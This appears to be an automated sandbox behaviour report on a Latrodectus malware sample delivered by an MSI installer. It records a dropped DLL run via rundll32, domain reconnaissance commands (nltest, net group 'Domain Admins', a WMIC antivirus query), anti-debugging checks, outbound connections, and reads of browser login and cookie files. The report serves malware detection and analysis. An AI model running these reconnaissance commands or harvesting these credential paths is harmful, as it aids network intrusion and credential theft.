Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIFFD6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dll	Jump to dropped file

Source: C:\Windows\Installer\MSI181.tmp

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_3-32925

Source: C:\Windows\Installer\MSI181.tmp	API coverage: 7.4 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 1.6 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 8.2 %

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000000180049AEC

5_2_0000000180049AEC

Source: C:\Windows\System32\wscript.exe TID: 7536	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7628	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7788	Thread sleep count: 737 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7788	Thread sleep time: -737000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7800	Thread sleep count: 663 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7800	Thread sleep time: -66300s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7788	Thread sleep count: 8599 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7788	Thread sleep time: -8599000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005BB02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_005BB02D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CEA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	5_2_00000235B5CEA350
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	5_2_00000235B5CE1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010316604 FindFirstFileA,FindNextFileA,	6_3_0000018010316604
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103116F4 FindFirstFileW,FindNextFileW,	6_3_00000180103116F4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532BA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	7_2_000001EF532BA350
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	7_2_000001EF532B1A08

Source: C:\Windows\System32\rundll32.exe

Code function: 6_3_000001801031AC90 GetSystemInfo,

6_3_000001801031AC90

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\	Jump to behavior

Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640113288.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1646222764.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1647249361.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1646955380.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1646701265.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1647698950.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903527062.000001800DFBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW*
Source: rundll32.exe, 00000006.00000003.2933135638.0000018010220000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No

Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 6_3_00000180103176DC rdtsc

6_3_00000180103176DC

Source: C:\Windows\Installer\MSI181.tmp

Code function: 3_2_0058D0A5 IsDebuggerPresent,OutputDebugStringW,

3_2_0058D0A5

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,

5_2_0000000180066C3C

Source: C:\Windows\System32\rundll32.exe

5_2_00000001800033E0

Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005BAD78 mov eax, dword ptr fs:[00000030h]		3_2_005BAD78
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005B2DCC mov ecx, dword ptr fs:[00000030h]		3_2_005B2DCC

Source: C:\Windows\Installer\MSI181.tmp

Code function: 3_2_00582310 GetProcessHeap,

3_2_00582310

Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005A33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_005A33A8
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005A353F SetUnhandledExceptionFilter,	3_2_005A353F
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005A2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_005A2968
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005A6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_005A6E1B
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 104.21.46.75 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.197.34 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.219.28 443	Jump to behavior

Source: C:\Windows\Installer\MSI181.tmp

Code function: 3_2_005852F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,GetProcessId,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,

3_2_005852F0

Source: C:\Windows\Installer\MSI181.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle,

5_2_000000018004A650

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,

5_2_0000000180049278

Source: 360total.dll.1.dr	Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe	Binary or memory string: Progman
Source: rundll32.exe	Binary or memory string: Program manager

Source: C:\Windows\Installer\MSI181.tmp

Code function: 3_2_005A35A9 cpuid

3_2_005A35A9

Source: C:\Windows\Installer\MSI181.tmp	Code function: EnumSystemLocalesW,	3_2_005BE0C6
Source: C:\Windows\Installer\MSI181.tmp	Code function: EnumSystemLocalesW,	3_2_005BE111
Source: C:\Windows\Installer\MSI181.tmp	Code function: EnumSystemLocalesW,	3_2_005B7132
Source: C:\Windows\Installer\MSI181.tmp	Code function: EnumSystemLocalesW,	3_2_005BE1AC
Source: C:\Windows\Installer\MSI181.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_005BE237
Source: C:\Windows\Installer\MSI181.tmp	Code function: GetLocaleInfoEx,	3_2_005A23F8
Source: C:\Windows\Installer\MSI181.tmp	Code function: GetLocaleInfoW,	3_2_005BE48A
Source: C:\Windows\Installer\MSI181.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_005BE5B3
Source: C:\Windows\Installer\MSI181.tmp	Code function: GetLocaleInfoW,	3_2_005BE6B9
Source: C:\Windows\Installer\MSI181.tmp	Code function: GetLocaleInfoW,	3_2_005B76AF
Source: C:\Windows\Installer\MSI181.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_005BE788

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI181.tmp

Code function: 3_2_005A37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_005A37D5

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00000235B5CE8AE0 GetUserNameA,wsprintfA,

5_2_00000235B5CE8AE0

Source: C:\Windows\Installer\MSI181.tmp

Code function: 3_2_005B7B1F GetTimeZoneInformation,

3_2_005B7B1F

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,

5_2_0000000180040CB0

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: WMIC.exe, 0000002A.00000003.3195192679.000001BA30DF5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198657676.000001BA30FEA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3195527472.000001BA315C1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197567716.000001BA30E04000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197538144.000001BA30DF9000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198389335.000001BA30E02000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197642042.000001BA30E00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000002.3198657676.000001BA30FEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000002.3197873224.0000008797B37000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
Source: rundll32.exe	Binary or memory string: 360tray.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: WMIC.exe, 0000002A.00000003.3194482895.000001BA30DD8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198278627.000001BA30DE5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3195192679.000001BA30DE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000002.3198657676.000001BA30FEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000003.3194482895.000001BA30DD8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198278627.000001BA30DE5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3195192679.000001BA30DE4000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3196824187.000001BA3159C000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198199363.000001BA30DDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: WMIC.exe, 0000002A.00000003.3195192679.000001BA30DF5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197538144.000001BA30DF9000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197642042.000001BA30E00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Latrodectus

Source: Yara match	File source: 7.2.rundll32.exe.1ef532b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.235b4340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.235b5ce0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.235b4340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1ef532a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1ef532b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1ef532a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.235b5ce0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.2983475717.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2790656279.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2738493222.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2983528800.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2934278162.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.3043571681.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1683586362.00000235B4340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1715800687.000001EF532A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2995791620.0000018010010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2856871010.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1715838763.000001EF532B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2656498432.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies	Jump to behavior
